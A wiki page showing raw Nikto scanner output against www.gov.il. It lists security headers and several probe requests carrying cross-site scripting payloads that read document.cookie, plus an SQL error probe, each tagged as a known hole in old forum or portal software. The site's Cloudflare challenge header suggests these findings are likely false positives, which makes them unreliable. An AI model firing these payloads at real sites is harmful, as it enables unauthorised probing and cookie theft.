Wiki

nikto_www.gov.il.txt.gz

gunzip -c nikto_www.gov.il.txt.gz 
- Nikto v2.1.5/2.1.5
- Nikto v2.1.5/2.1.5
- Nikto v2.1.5/2.1.5
+ Target Host: www.gov.il
+ Target Port: 80
+ GET /: Cookie __cf_bm created without the httponly flag
+ GET /: IP address found in the '__cf_bm' cookie. The IP is "1.0.1.1".
+ GET /: IP address found in the 'set-cookie' header. The IP is "1.0.1.1".
+ GET /: Uncommon header 'cf-ray' found, with contents: 952594134cd90329-MAD
+ GET /: Uncommon header 'cross-origin-resource-policy' found, with contents: same-origin
+ GET /: Uncommon header 'cross-origin-opener-policy' found, with contents: same-origin
+ GET /: Uncommon header 'origin-agent-cluster' found, with contents: ?1
+ GET /: Uncommon header 'permissions-policy' found, with contents: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
+ GET /: Uncommon header 'server-timing' found, with contents: chlray;desc="952594134cd90329"
+ GET /: Uncommon header 'accept-ch' found, with contents: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
+ GET /: Uncommon header 'x-content-type-options' found, with contents: nosniff
+ GET /: Uncommon header 'x-frame-options' found, with contents: SAMEORIGIN
+ GET /: Uncommon header 'critical-ch' found, with contents: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
+ GET /: Uncommon header 'cf-mitigated' found, with contents: challenge
+ GET /: Uncommon header 'referrer-policy' found, with contents: same-origin
+ GET /: Uncommon header 'cross-origin-embedder-policy' found, with contents: require-corp
+ -9392: GET /userinfo.php?uid=1;: /userinfo.php?uid=1;: Xoops portal gives detailed error messages including SQL syntax and may allow an exploit.
+ -27071: GET /phpimageview.php?pic=javascript:alert(8754): /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: /myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -3931: GET /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ GET /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -4598: GET /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: /members.asp?SF=%22;}alert(223344);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ -2946: GET /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.